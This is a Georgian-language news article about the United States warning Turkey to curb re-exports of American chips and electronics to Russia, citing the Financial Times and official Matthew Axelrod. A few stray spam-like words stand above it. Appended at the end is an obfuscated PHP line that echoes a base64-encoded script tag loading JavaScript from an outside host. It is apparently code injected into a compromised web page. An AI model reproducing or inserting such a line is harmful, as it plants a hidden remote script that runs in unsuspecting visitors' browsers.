celsiusi
ავერსი შნაიდერი

 ვაშინგტონი თურქეთს აფრთხილებს, თუ არ შეზღუდავს რუსეთში ამერიკული სამხედრო ტექნიკის ექსპორტს, ამას გარკვეული შედეგები მოჰყვება. ამის შესახებ ინფორმაციას „ფაინენშელ თაიმსი“ ავრცელებს.

ვაჭრობის მდივნის თანაშემწე მეთიუ აქსელროდი, რომელიც ხელმძღვანელობს აშშ-ის ძალისხმევას მგრძნობიარე ტექნოლოგიები ამერიკის მოწინააღმდეგეების ხელში არ აღმოჩნდეს, ცოტა ხნის წინ შეხვდა თურქეთის ოფიციალურ პირებს ანკარასა და სტამბოლში.

მეთიუ აქსელროდის თქმით, თურქეთმა მეტი უნდა იმუშაოს იმ ამერიკული წარმოშობის ჩიპებითა და სხვა ნაწილებით ვაჭრობის შესაჩერებლად, რომლებიც გადამწყვეტია რუსეთის უკრაინაში ომისთვის.

„საჭიროა, თურქეთი დაგვეხმაროს შეაჩეროს ამერიკული ტექნოლოგიების უკანონო ნაკადი რუსეთში. ჩვენ უნდა დავინახოთ სწრაფი პროგრესი თურქეთის ხელისუფლებისა და ინდუსტრიის მხრიდან, წინააღმდეგ შემთხვევაში, სხვა არჩევანი არ გვექნება გარდა იმისა, რომ იქნება შედეგები მათზე, ვინც თავს არიდებს ჩვენს საექსპორტო კონტროლს“, – განაცხადა მეთიუ აქსელროდმა.

„ფაინენშელ თაიმსის“ ცნობით, აშშ განსაკუთრებით შეშფოთებულია იმით, რომ თურქეთი იქცა საკვანძო კერად, რომლის მეშვეობითაც დასავლური წარმოების ელექტრონიკა, მათ შორის პროცესორები, მეხსიერების ბარათები და გამაძლიერებლები, რუსეთში ექსპორტის კონტროლის დარღვევით შედის.

აშშ-ის კომერციის დეპარტამენტმა უკვე დაამატა 18 თურქული კომპანია თავის სიაში ამ ვაჭრობის გამო. აშშ-ის სახაზინო დეპარტამენტმა ცალ-ცალკე დაუწესა სანქციები მრავალ თურქულ კომპანიას რუსეთის სამხედრო-სამრეწველო კომპლექსისთვის მასალების სავარაუდო მიწოდების გამო.

131
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");